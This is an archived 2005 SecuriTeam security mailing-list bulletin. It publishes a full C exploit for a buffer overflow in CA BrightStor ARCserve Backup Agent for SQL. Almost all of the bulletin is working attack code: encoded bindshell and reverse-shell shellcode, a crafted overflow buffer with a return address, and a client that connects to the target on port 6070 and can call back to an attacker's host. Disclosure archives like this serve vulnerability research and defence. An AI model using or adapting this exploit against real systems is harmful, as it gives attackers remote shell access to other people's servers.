Network Security: Detailed info on [EXPL] CA BrightStor ARCserve Backup Agent for SQL (Exploit)

Subject:	[EXPL] CA BrightStor ARCserve Backup Agent for SQL (Exploit)
Date:	18 Aug 2005 17:01:18 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  CA BrightStor ARCserve Backup Agent for SQL (Exploit)
------------------------------------------------------------------------


SUMMARY

Computer Associates International Inc's BrightStor ARCserve Backup 
UniversalAgent allows attackers to execute arbitrary code. For more 
information see our previously published article:  
<http://www.securiteam.com/windowsntfocus/5LP0620GKI.html> CA BrightStor 
ARCserve Backup Agent For MS SQL Server Buffer Overflow. Provided below is 
an exploit for the vulnerability in ARCserve Backup Agent for SQL.

DETAILS

Exploit Code:
/*
 * CA BrightStor ARCserve Backup Agent for SQL - dbasqlr.exe
 *
 * cybertronic[at]gmx[dot]net
 *
 */

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 6070

unsigned char bindshell[] =
"\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff\xff\xff\x81\x36\x80\xbf\x32"
"\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff"
"\x03\x53\x06\x1f\x74\x57\x75\x95\x80\xbf\xbb\x92\x7f\x89\x5a\x1a"
"\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09\xf9\x3a\x6b\xb6\xd7\x9f\x4d"
"\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6\xb3\x5a\xf8\xec\xbf\x32\xfc"
"\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf\xeb\xcd\xc2\x88\x36\x74\x90"
"\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad\xbe\x32\x94\x09\xf9\x22\x6b"
"\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81\xbf\x32\x1d\xc6\xab\xcd\xe2"
"\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81\xbf\x32\x1d\xc6\xa7\xcd\xe2"
"\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80\xbf\x32\x1d\xc6\xa3\xcd\xe2"
"\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80\xbf\x32\x1d\xc6\x9f\xcd\xe2"
"\x84\xd7\x96\x39\xae\x56\xda\x4a\x80\xbf\x32\x1d\xc6\x9b\xcd\xe2"
"\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80\xbf\x32\x1d\xc6\x97\xcd\xe2"
"\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80\xbf\x32\x1d\xc6\x93\x01\x6b"
"\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81\xbe\x32\x94\x7f\xe9\x2a\xc4"
"\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6\xa3\xb9\x4c\xd7\xe8\x5a\x96"
"\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3\x40\x64\xb4\xd7\xec\xcd\xc2"
"\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50\xd7\x57\xec\xe5\xbf\x5a\xf7"
"\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4\x32\x0e\xb0\xb3\x7f\x01\x5d"
"\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4\xaf\x76\x6a\xc4\x9b\x0f\x1d"
"\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4\x9b\x62\x19\xc4\x9b\x22\xc0"
"\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f\xc9\x02\xc5\x7f\xe9\x22\x1f"
"\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b\x77\x65\x6b\xd6\x93\xcd\xc2"
"\x94\xea\x64\xf0\x21\x8f\x32\x94\x80\x3a\xf2\xec\x8c\x34\x72\x98"
"\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89\x34\x72\xa0\x0b\x17\x8a\x94"
"\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80\xec\x67\xc2\xd7\x34\x5e\xb0"
"\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83\x6a\xb9\xde\x98\x34\x68\xb4"
"\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83\x4a\x01\x6b\x7c\x8c\xf2\x38"
"\xba\x7b\x46\x93\x41\x70\x3f\x97\x78\x54\xc0\xaf\xfc\x9b\x26\xe1"
"\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c\xf4\xb9\xce\x9c\xbc\xef\x1f"
"\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b\x6a\x6d\xca\xdd\xe4\xf0\x90"
"\x80\x2f\xa2\x04";

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

void
exploit ( int s, unsigned long cbip, unsigned short cbport, int option )
{
 unsigned long pushesp = 0x20c0c1ab;
 char buffer[3289];

 bzero ( &buffer, sizeof ( buffer ) );
 memset ( buffer, 0x41, sizeof ( buffer ) - 1 );
 memcpy ( buffer + 1337, "\x81\xc4\x54\xf2\xff\xff", 6 );
 memcpy ( buffer + 3168, ( unsigned char* ) &pushesp, 4 );
 memcpy ( buffer + 3172, "\xe9\xd0\xf8\xff\xff", 5 );

 if ( option == 0 )
 {
  memcpy ( &reverseshell[111], &cbip, 4);
  memcpy ( &reverseshell[118], &cbport, 2);
  memcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );
 }
 else
  memcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );

 printf ( "attacking with %u bytes...", strlen ( buffer ) );
 write ( s, buffer, strlen ( buffer ) );
 printf ( "done!\n" );
 close ( s );
}

int
main ( int argc, char* argv[] )
{
 int s;
 unsigned long cbip;
 unsigned short cbport;
 struct sockaddr_in remote_addr;
 struct hostent* host_addr;

 if ( argc != 2 )
  if ( argc != 4 )
   { fprintf ( stderr, "Usage\n-----\n[bindshell] %s \n[reverseshell] %s   
\n", argv[0], argv[0] ); exit ( 1 ); }

 if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
  { fprintf ( stderr, "Cannot resolve hostname: %s\n", argv[1] ); exit ( 1 
); }

 remote_addr.sin_family = AF_INET;
 remote_addr.sin_addr   = * ( ( struct in_addr * ) host_addr->h_addr );
 remote_addr.sin_port   = htons ( PORT );

 s = socket ( AF_INET, SOCK_STREAM, 0 );
 printf ( "connecting to %s:%u...", argv[1], PORT );
 if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct 
sockaddr ) ) ==  -1 )
  { printf ( "failed!\n" ); exit ( 1 ); }
 printf ( "ok!\n" );

 if ( argc == 4 )
 {
  cbip = inet_addr ( argv[2] ) ^ ( unsigned long ) 0x99999999;
  cbport = htons ( atoi ( argv[3] ) ) ^ ( unsigned short ) 0x9999;
  exploit ( s, cbip, cbport, 0 );
 }
 else
  exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
}


ADDITIONAL INFORMATION

The original article can be found at:  
<http://www.livejournal.com/users/cybertronic/> 
http://www.livejournal.com/users/cybertronic/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
<Prev in Thread]	Current Thread	[Next in Thread>
[EXPL] CA BrightStor ARCserve Backup Agent for SQL (Exploit), SecuriTeam <=
Previous by Date:	[NEWS] Linksys WRT54GS WPA Personal/TKIP Authentication Flaws, SecuriTeam
Next by Date:	[NT] NetworkActiv Web Server Directory Traversal, SecuriTeam
Previous by Thread:	[NEWS] Linksys WRT54GS WPA Personal/TKIP Authentication Flaws, SecuriTeam
Next by Thread:	[NT] NetworkActiv Web Server Directory Traversal, SecuriTeam
Indexes:	[Date] [Thread] [Top] [All Lists]